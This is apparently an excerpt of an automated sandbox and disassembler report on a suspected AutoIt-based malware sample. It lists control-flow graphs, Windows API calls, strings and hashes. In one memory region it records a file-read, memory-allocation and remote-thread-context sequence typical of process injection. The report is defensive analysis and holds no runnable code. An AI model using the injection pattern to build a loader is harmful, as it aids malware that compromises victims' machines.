                                                • Opcode Fuzzy Hash: 29ea1d5d23207383114390d0f3e2ecb85b7bf35a97a970a8b441330e07ae9cd8
                                                • Instruction Fuzzy Hash: 09217EB4D00305AFEB32DFA4EE89B9D7BB0FB09711F00011AF584A6295D3BA56409F81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 767 f83633-f83681 769 f836e1-f836e3 767->769 770 f83683-f83686 767->770 769->770 771 f836e5 769->771 772 f83688-f8368f 770->772 773 f836e7 770->773 774 f836ca-f836d2 DefWindowProcW 771->774 777 f8374b-f83753 PostQuitMessage 772->777 778 f83695-f8369a 772->778 775 f836ed-f836f0 773->775 776 fbd0cc-fbd0fa call f91070 call f91093 773->776 780 f836d8-f836de 774->780 781 f836f2-f836f3 775->781 782 f83715-f8373c SetTimer RegisterWindowMessageW 775->782 810 fbd0ff-fbd106 776->810 779 f83711-f83713 777->779 784 f836a0-f836a2 778->784 785 fbd154-fbd168 call fe2527 778->785 779->780 787 f836f9-f8370c KillTimer call f8443a call f83114 781->787 788 fbd06f-fbd072 781->788 782->779 790 f8373e-f83749 CreatePopupMenu 782->790 791 f836a8-f836ad 784->791 792 f83755-f83764 call f844a0 784->792 785->779 804 fbd16e 785->804 787->779 797 fbd0a8-fbd0c7 MoveWindow 788->797 798 fbd074-fbd076 788->798 790->779 793 fbd139-fbd140 791->793 794 f836b3-f836b8 791->794 792->779 793->774 809 fbd146-fbd14f call fd7c36 793->809 802 f836be-f836c4 794->802 803 fbd124-fbd134 call fe2d36 794->803 797->779 806 fbd078-fbd07b 798->806 807 fbd097-fbd0a3 SetFocus 798->807 802->774 802->810 803->779 804->774 806->802 811 fbd081-fbd092 call f91070 806->811 807->779 809->774 810->774 815 fbd10c-fbd11f call f8443a call f8434a 810->815 811->779 815->774
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00F836D2
                                                • KillTimer.USER32(?,00000001), ref: 00F836FC
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F8371F
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8372A
                                                • CreatePopupMenu.USER32 ref: 00F8373E
                                                • PostQuitMessage.USER32(00000000), ref: 00F8374D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: a6291c9f5c903a45e93915a8a123f021599821e2874b58cfe946c7fe5943a240
                                                • Instruction ID: 87ca86acfee067a6b465c09cce1c057348fef8c97c4537122b72106999c50f14
                                                • Opcode Fuzzy Hash: a6291c9f5c903a45e93915a8a123f021599821e2874b58cfe946c7fe5943a240
                                                • Instruction Fuzzy Hash: 1C4145F2604106BBEB30BF68DD89FFD3754FB01710F100529F582D62A5EA6A9E01B762

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                • API String ID: 1825951767-3513169116
                                                • Opcode ID: d663bf8af9977ba1a02d0fcd44075a213c4615ee5ddcd159f3b9262c4e85ca6a
                                                • Instruction ID: d6f663d83e2cd3f089e5eb7fa68157b03fd215319d7254d26e68fcf7484fd834
                                                • Opcode Fuzzy Hash: d663bf8af9977ba1a02d0fcd44075a213c4615ee5ddcd159f3b9262c4e85ca6a
                                                • Instruction Fuzzy Hash: A0A17DB290021D9BDF15FBA4DC91AEEB779BF15710F44042AF412B7191EF789A08EB60

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 942 19958a8-1995956 call 19932a8 945 199595d-1995983 call 19967b8 CreateFileW 942->945 948 199598a-199599a 945->948 949 1995985 945->949 956 199599c 948->956 957 19959a1-19959bb VirtualAlloc 948->957 950 1995ad5-1995ad9 949->950 951 1995b1b-1995b1e 950->951 952 1995adb-1995adf 950->952 958 1995b21-1995b28 951->958 954 1995aeb-1995aef 952->954 955 1995ae1-1995ae4 952->955 959 1995aff-1995b03 954->959 960 1995af1-1995afb 954->960 955->954 956->950 961 19959bd 957->961 962 19959c2-19959d9 ReadFile 957->962 963 1995b2a-1995b35 958->963 964 1995b7d-1995b92 958->964 967 1995b13 959->967 968 1995b05-1995b0f 959->968 960->959 961->950 969 19959db 962->969 970 19959e0-1995a20 VirtualAlloc 962->970 971 1995b39-1995b45 963->971 972 1995b37 963->972 965 1995ba2-1995baa 964->965 966 1995b94-1995b9f VirtualFree 964->966 966->965 967->951 968->967 969->950 975 1995a22 970->975 976 1995a27-1995a42 call 1996a08 970->976 973 1995b59-1995b65 971->973 974 1995b47-1995b57 971->974 972->964 979 1995b72-1995b78 973->979 980 1995b67-1995b70 973->980 978 1995b7b 974->978 975->950 982 1995a4d-1995a57 976->982 978->958 979->978 980->978 983 1995a59-1995a88 call 1996a08 982->983 984 1995a8a-1995a9e call 1996818 982->984 983->982 990 1995aa0 984->990 991 1995aa2-1995aa6 984->991 990->950 992 1995aa8-1995aac CloseHandle 991->992 993 1995ab2-1995ab6 991->993 992->993 994 1995ab8-1995ac3 VirtualFree 993->994 995 1995ac6-1995acf 993->995 994->995 995->945 995->950
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01995979
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01995B9F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction ID: 7939e4151f9f422644126bea49706ea5e217dc7f97c5ca779fb81dec9e4f54a9
                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction Fuzzy Hash: F1A10970E01209EBEF15CFA8C894BAEBBB5FF48315F208559E505BB280D7795A41CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1073 f839d5-f83a45 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A03
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A24
                                                • ShowWindow.USER32(00000000,?,?), ref: 00F83A38
                                                • ShowWindow.USER32(00000000,?,?), ref: 00F83A41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: b6b7c543ffa09ae8ca7450d492b73fe3d3b3d46b94277c58a0a221eaab5f4dbb
                                                • Instruction ID: 5bd38f53492a47773de34f6b4925980dc1a3b4d8755652d85f4680c53f47f0d1
                                                • Opcode Fuzzy Hash: b6b7c543ffa09ae8ca7450d492b73fe3d3b3d46b94277c58a0a221eaab5f4dbb
                                                • Instruction Fuzzy Hash: E5F03AB45402907FEA325627AE88E2B3E7DE7CBF50F00001EB984E2194C26A0C40DBB0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1074 1995658-19957aa call 19932a8 call 1995548 CreateFileW 1081 19957ac 1074->1081 1082 19957b1-19957c1 1074->1082 1083 1995861-1995866 1081->1083 1085 19957c8-19957e2 VirtualAlloc 1082->1085 1086 19957c3 1082->1086 1087 19957e4 1085->1087 1088 19957e6-19957fd ReadFile 1085->1088 1086->1083 1087->1083 1089 19957ff 1088->1089 1090 1995801-199583b call 1995588 call 1994548 1088->1090 1089->1083 1095 199583d-1995852 call 19955d8 1090->1095 1096 1995857-199585f ExitProcess 1090->1096 1095->1096 1096->1083
                                                APIs
                                                  • Part of subcall function 01995548: Sleep.KERNELBASE(000001F4), ref: 01995559
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 019957A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: EZ8OQ1ELMVEJOQHGK468LUWUOCAB
                                                • API String ID: 2694422964-1905461656
                                                • Opcode ID: cedf0f67a0a1c3f9bbc9296ece8325afb216f23fca1295e7d6ab10d4e2ecf17b
                                                • Instruction ID: bd460a274610a775288945086b2ef551b20525c5d55c650557ce136823bf9b0a
                                                • Opcode Fuzzy Hash: cedf0f67a0a1c3f9bbc9296ece8325afb216f23fca1295e7d6ab10d4e2ecf17b
                                                • Instruction Fuzzy Hash: 8F617370D04288DBEF12DBB8C854BDFBBB5AF15304F044199E2487B2C1D6B91B49CB66

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1098 f8407c-f84092 1099 f84098-f840ad call f87a16 1098->1099 1100 f8416f-f84173 1098->1100 1103 fbd3c8-fbd3d7 LoadStringW 1099->1103 1104 f840b3-f840d3 call f87bcc 1099->1104 1107 fbd3e2-fbd3fa call f87b2e call f86fe3 1103->1107 1104->1107 1108 f840d9-f840dd 1104->1108 1117 f840ed-f8416a call fa2de0 call f8454e call fa2dbc Shell_NotifyIconW call f85904 1107->1117 1119 fbd400-fbd41e call f87cab call f86fe3 call f87cab 1107->1119 1110 f840e3-f840e8 call f87b2e 1108->1110 1111 f84174-f8417d call f88047 1108->1111 1110->1117 1111->1117 1117->1100 1119->1117
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FBD3D7
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                • _memset.LIBCMT ref: 00F840FC
                                                • _wcscpy.LIBCMT ref: 00F84150
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F84160
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 3942752672-1585850449
                                                • Opcode ID: 1d7edca94d1962e83be7ad24a9dd9b3622aedf3c241d50c904d1ebe3953225eb
                                                • Instruction ID: a52ccb629d936a3ade9a5a631d94701fa5895d779c38b2ee5f315acfe682765a
                                                • Opcode Fuzzy Hash: 1d7edca94d1962e83be7ad24a9dd9b3622aedf3c241d50c904d1ebe3953225eb
                                                • Instruction Fuzzy Hash: 2631C1B1408305ABD331FB60DD86FDB77D8AF85314F20451EF6C596092EB78A648EB92

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1133 f8686a-f86891 call f84ddd 1136 fbe031-fbe041 call fe955b 1133->1136 1137 f86897-f868a5 call f84ddd 1133->1137 1140 fbe046-fbe048 1136->1140 1137->1136 1142 f868ab-f868b1 1137->1142 1143 fbe04a-fbe04d call f84e4a 1140->1143 1144 fbe067-fbe0af call fa0db6 1140->1144 1145 fbe052-fbe061 call fe42f8 1142->1145 1146 f868b7-f868d9 call f86a8c 1142->1146 1143->1145 1152 fbe0b1-fbe0bb 1144->1152 1153 fbe0d4 1144->1153 1145->1144 1156 fbe0cf-fbe0d0 1152->1156 1157 fbe0d6-fbe0e9 1153->1157 1158 fbe0bd-fbe0cc 1156->1158 1159 fbe0d2 1156->1159 1160 fbe0ef 1157->1160 1161 fbe260-fbe263 call fa2d55 1157->1161 1158->1156 1159->1157 1163 fbe0f6-fbe0f9 call f87480 1160->1163 1164 fbe268-fbe271 call f84e4a 1161->1164 1167 fbe0fe-fbe120 call f85db2 call fe73e9 1163->1167 1170 fbe273-fbe283 call f87616 call f85d9b 1164->1170 1177 fbe122-fbe12f 1167->1177 1178 fbe134-fbe13e call fe73d3 1167->1178 1186 fbe288-fbe2b8 call fdf7a1 call fa0e2c call fa2d55 call f84e4a 1170->1186 1181 fbe227-fbe237 call f8750f 1177->1181 1184 fbe158-fbe162 call fe73bd 1178->1184 1185 fbe140-fbe153 1178->1185 1181->1167 1190 fbe23d-fbe25a call f8735d 1181->1190 1195 fbe176-fbe180 call f85e2a 1184->1195 1196 fbe164-fbe171 1184->1196 1185->1181 1186->1170 1190->1161 1190->1163 1195->1181 1203 fbe186-fbe19e call fdf73d 1195->1203 1196->1181 1208 fbe1c1-fbe1c4 1203->1208 1209 fbe1a0-fbe1bf call f87de1 call f85904 1203->1209 1210 fbe1f2-fbe1f5 1208->1210 1211 fbe1c6-fbe1c9 call f87de1 1208->1211 1232 fbe1e2-fbe1f0 call f85db2 1209->1232 1213 fbe1f7-fbe200 call fdf65e 1210->1213 1214 fbe215-fbe218 call fe737f 1210->1214 1219 fbe1ce-fbe1e1 call f86839 call f85904 1211->1219 1213->1186 1225 fbe206-fbe210 call fa0e2c 1213->1225 1222 fbe21d-fbe226 call fa0e2c 1214->1222 1219->1232 1222->1181 1225->1167 1232->1222
                                                APIs
                                                  • Part of subcall function 00F84DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84E0F
                                                • _free.LIBCMT ref: 00FBE263
                                                • _free.LIBCMT ref: 00FBE2AA
                                                  • Part of subcall function 00F86A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86BAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                • API String ID: 2861923089-1757145024
                                                • Opcode ID: 106561f5c8149ad5a712cd5e1141d67aee09bcd9c7d98200d3957d077f79536c
                                                • Instruction ID: a12bf63d058d1ca191e3a71abb41d004b4a1a1450f058766bb2a51021f80e526
                                                • Opcode Fuzzy Hash: 106561f5c8149ad5a712cd5e1141d67aee09bcd9c7d98200d3957d077f79536c
                                                • Instruction Fuzzy Hash: E6915E71D04219AFCF14EFA5CC819EDB7B8FF19310B14452AF816AB2A1DB74A905EF50
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F835A1,SwapMouseButtons,00000004,?), ref: 00F835D4
                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F835F5
                                                • RegCloseKey.KERNELBASE(00000000,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F83617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 3677997916-824357125
                                                • Opcode ID: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                                                • Instruction ID: d2d41da5cc5d713ad8a88e72091f381c0c5bd2bfd0570f1d34def8ed8a641992
                                                • Opcode Fuzzy Hash: 58f0f0b7e54908b99a741557de8a256e6c08155e91418cb76a294e985c864f1e
                                                • Instruction Fuzzy Hash: 30115A71910208BFDB21DF68D844EEEB7B8EF04B50F008459F805D7224E2719F40A760
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01994D03
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01994D99
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01994DBB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                • Instruction ID: 5cd24c155bb6580ccf996253496d9ddf17bac9c7ded16ab9e737cee65f6df3cb
                                                • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                • Instruction Fuzzy Hash: D862FB30A14258DBEB25CFA8C850BDEB776EF58301F1091A9D10DEB390E7769E81CB59
                                                APIs
                                                  • Part of subcall function 00F84EE5: _fseek.LIBCMT ref: 00F84EFD
                                                  • Part of subcall function 00FE9734: _wcscmp.LIBCMT ref: 00FE9824
                                                  • Part of subcall function 00FE9734: _wcscmp.LIBCMT ref: 00FE9837
                                                • _free.LIBCMT ref: 00FE96A2
                                                • _free.LIBCMT ref: 00FE96A9
                                                • _free.LIBCMT ref: 00FE9714
                                                  • Part of subcall function 00FA2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9A24), ref: 00FA2D69
                                                  • Part of subcall function 00FA2D55: GetLastError.KERNEL32(00000000,?,00FA9A24), ref: 00FA2D7B
                                                • _free.LIBCMT ref: 00FE971C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                • String ID:
                                                • API String ID: 1552873950-0
                                                • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                • Instruction ID: beb5cfc92c0ca80020e2888aeb4dfb2629b008c61880d24d2cf7363dd52540fb
                                                • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                • Instruction Fuzzy Hash: 2D514CB1D04259AFDF249F65CC81AAEBBB9FF48300F10449EF609A3251DB755A80DF68
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                • Instruction ID: f6382e8299b96840c41d9761a8784c2a9ef7a46b83dd55d66c3816eafdfb1560
                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                • Instruction Fuzzy Hash: 0741B3F5E007869BDB188E69D8809AE77A5AFC3360B24813DE815C7680DBB4FD41AB40
                                                APIs
                                                • _memset.LIBCMT ref: 00FBEA39
                                                • GetOpenFileNameW.COMDLG32(?), ref: 00FBEA83
                                                  • Part of subcall function 00F84750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F84743,?,?,00F837AE,?), ref: 00F84770
                                                  • Part of subcall function 00FA0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA07B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                • String ID: X
                                                • API String ID: 3777226403-3081909835
                                                • Opcode ID: 4ba43ccb23601e5eee7c4e3d88fc358bd65ed4e2164b5e986e5de4d769f0f2b6
                                                • Instruction ID: 89356341e53f2e25022671a963f69366a0b58544bec870aab719ad34e879ada9
                                                • Opcode Fuzzy Hash: 4ba43ccb23601e5eee7c4e3d88fc358bd65ed4e2164b5e986e5de4d769f0f2b6
                                                • Instruction Fuzzy Hash: 2521C371A002489BDB51EF94CC45BEE7BFCAF49314F10805AF448E7241DBB89989AFA1
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00FE98F8
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FE990F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
